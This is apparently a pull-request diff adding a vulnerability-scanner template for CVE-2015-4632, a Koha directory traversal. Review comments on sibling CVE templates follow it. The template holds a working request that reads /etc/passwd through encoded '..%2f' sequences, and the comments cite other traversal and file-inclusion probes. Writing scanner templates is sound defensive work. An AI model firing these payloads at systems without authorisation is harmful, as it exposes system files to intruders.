@@ -0,0 +1,27 @@ +id: CVE-2015-4632 + +info: + name: Koha 3.20.1 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. + reference: | + - https://www.exploit-db.com/exploits/37388 + - https://www.cvedetails.com/cve/CVE-2015-4632 + tags: cve,cve2015,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file
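Review bot: In cves/2010/CVE-2010-1653.yml the unquoted description contains "NOTE: some of these details ...", and a colon followed by a space inside a plain YAML scalar is read as a mapping separator, so the template will fail to parse. Quote the whole description or switch it to a block scalar (description: |). The same unquoted "NOTE: " text appears in the descriptions of CVE-2010-1715.yml and CVE-2010-1873.yml.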
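Review bot: The description in cves/2010/CVE-2010-1873.yml does not match what the template checks: it describes a SQL injection via the aid parameter, while the name says Local File Inclusion and the request probes the controller parameter for traversal. Either the CVE id is wrong for this check or the description was copied from the wrong entry; confirm which and make id, name, description and tags agree. CVE-2010-4977.yml (SQL injection via mealid, request tests controller) and CVE-2010-5028.yml (SQL injection via catid, request tests view) have the same mismatch.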
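Review bot: The reference key in cves/2010/CVE-2010-1957.yml is written as a plain YAML list (reference: with no |), while most other templates in this patch use a block scalar (reference: |), so the field has a different type from file to file. Pick one form and apply it throughout; CVE-2010-1977.yml and CVE-2012-0981.yml also omit the |.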
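Review bot: The request path in cves/2010/CVE-2010-2045.yml still carries the advisory's literal placeholder, controller=[LFI]%00, so the response can never contain a passwd line and the template will never match. Replace the placeholder with a concrete value consistent with the matcher, or drop the template until it has been verified against a test instance. The same placeholder is left in CVE-2010-2680.yml (view=[LFI]), CVE-2010-2857.yml (cid=[LFI]%00) and CVE-2010-4719.yml (controller=[LFI]%00).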
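Review bot: cves/2010/CVE-2010-2918.yml cannot fire as written: the path ends in the literal placeholder mosConfig_absolute_path=[evilcode], and the matcher looks for a passwd line although the name and description say remote file inclusion. The lfi tag is also wrong for this class. Rework the request and matchers for the issue the description states and retag it, or leave this template out of the batch.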
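Review bot: In cves/2010/CVE-2010-3203.yml the request asks for ../../../configuration.php but the matcher expects "root:.*:0:0", which is passwd content, so a vulnerable host returning the requested file is reported as clean. Make the request and the regex agree on the same file. CVE-2010-4769.yml has the same disagreement: it requests /proc/self/environ and matches on a passwd line.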
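Review bot: The name in cves/2010/CVE-2010-4282.yml is "phpShowtime 2.0 - Directory Traversal", but the description and the /pandora_console/ajax.php path are for Pandora FMS. The name looks copied from CVE-2012-0981.yml, which carries the identical string; rename this one so scan output identifies the right product.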
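Review bot: The body matcher in cves/2014/CVE-2014-4539.yaml is only the two characters '> as the hunk reads here, which occur in ordinary HTML, so together with text/html and status 200 it will flag pages that do not reflect the payload at all. Match on the full reflected string sent in the request instead. In CVE-2014-4592.yaml the word is the empty string, which matches every body. These XSS templates also have no description field, unlike the traversal templates in the same patch.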
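Review bot: The plugin directory in the path of cves/2014/CVE-2014-4550.yaml is written with an en dash (shortcode–ninja) rather than an ASCII hyphen, so the request targets a path that does not exist and the check silently returns nothing. Retype the slug with plain hyphens; the same en dashes are in CVE-2014-4558.yaml (swipehq–payment–gateway–woocommerce), CVE-2014-4561.yaml (ultimate–weather–plugin) and CVE-2014-4592.yaml (wp–planet). CVE-2014-4558.yaml also has a trailing space before the closing quote of the path.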
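Review bot: The description in cves/2014/CVE-2014-5258.yml says the issue is reachable by "remote authenticated users", but the template sends a single GET to showTempFile.php with no login step or session. Against a default install this will produce false negatives; add the authentication step the description implies, or state in the info block that the check only covers instances where the file is reachable without a session.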
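Review bot: cves/2015/CVE-2015-4632.yml ends with "\ No newline at end of file", as does every other file added in this patch. Add the trailing newline to each file, and settle on one extension while you are at it: the patch mixes .yml (the traversal templates) with .yaml (the CVE-2014-45xx XSS templates).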